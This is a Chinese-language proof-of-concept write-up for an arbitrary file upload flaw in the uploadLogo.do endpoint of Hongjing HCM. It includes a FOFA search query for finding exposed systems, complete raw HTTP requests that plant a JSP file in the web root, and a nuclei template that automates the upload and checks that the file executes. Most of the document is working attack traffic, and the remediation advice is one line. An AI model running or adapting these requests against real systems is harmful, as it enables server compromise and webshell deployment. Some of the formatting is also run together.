文章目录
- 免责声明
- 漏洞描述
- 搜索语法
- 漏洞复现
- nuclei
- 修复建议
免责声明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
宏景HCM是一款基于先进的人力资本管理体系和灵活开放的技术架构的企业管理系统,提供了强大的业务模型定义、权限管理、工作流平台、预警平台等个性化配置工具。该uoloadLogo.do接口处存在任意文件上传漏洞
搜索语法
fofa
body='<div class="hj-hy-all-one-logo"'
漏洞复现
先进行cookie的获取
http://ip/module/system/qrcard/mobilewrite/qrcardmain.jsp
获取路径
POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host:
User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: JSESSIONID=938C0F04C50E2F19741D5C23F3504CA2
Content-Length: 635
Content-Type: multipart/form-data; boundary=09040231427371112abff3a2a34c3efe--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="path"--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="lfType"0
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="param"param
--09040231427371112abff3a2a34c3efe--
进行上传文件
POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host:
Cookie: JSESSIONID=938C0F04C50E2F19741D5C23F3504CA2
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Length: 644------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="path"~2fopt~2fapache~2dtomcat~2d~39~2e~30~2e~33~33~2fwebapps~2fhrms~2f1.jsp
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="lfType"0
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r--访问`http://ip/1.jsp
nuclei
id: hongjingHC_uploadLogo.do_api_anyfile_upload
info:name: hongjingHC_uploadLogo.do_api_anyfile_uploadauthor: xlseverity: Critical
id: custom-upload-exploit
info:name: Custom Upload Exploit Detectionauthor: YourNameseverity: highdescription: |This template detects a potential vulnerability in the system by uploading a crafted file and checking if it can be executed.requests:- method: GETpath:- "/module/system/qrcard/mobilewrite/qrcardmain.jsp"headers:Host: "{{Hostname}}"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36Accept-Encoding: gzip, deflateConnection: keep-alivematchers-condition: andmatchers:- type: wordwords:- "JSESSIONID"extractors:- type: regexname: jsessionidpart: headerinternal: trueregex:- 'JSESSIONID=(.*);'- method: POSTpath:- "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"headers:Host: "{{Hostname}}"User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: "*/*"Connection: closeCookie: "JSESSIONID={{jsessionid}}"body: |--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="path"--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="lfType"0--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="logofile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="twoFile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>--09040231427371112abff3a2a34c3efeContent-Disposition: form-data; name="param"param--09040231427371112abff3a2a34c3efe--matchers-condition: andmatchers:- type: statusstatus:- 200extractors:- type: regexname: upload_pathpart: bodyregex:- 'getElementById$"pathvalue"$.value="(.*?)"'group: 1- method: POSTpath:- "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"headers:Host: "{{Hostname}}"User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: "*/*"Connection: closeCookie: "JSESSIONID={{jsessionid}}"Content-Type: "multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r"body: |------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="path"{{upload_path}}1.jsp------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="lfType"0------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="logofile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>------WebKitFormBoundaryfjKBvGWJbG07Z02rContent-Disposition: form-data; name="twoFile"; filename=""Content-Type: image/gif<%out.println("<h1>Hello World!</h1>");%>------WebKitFormBoundaryfjKBvGWJbG07Z02r--- method: GETpath:- "{{upload_path}}1.jsp"headers:Host: "{{Hostname}}"User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: "*/*"Connection: closematchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "<h1>Hello World!</h1>"修复建议
更新到最新版本
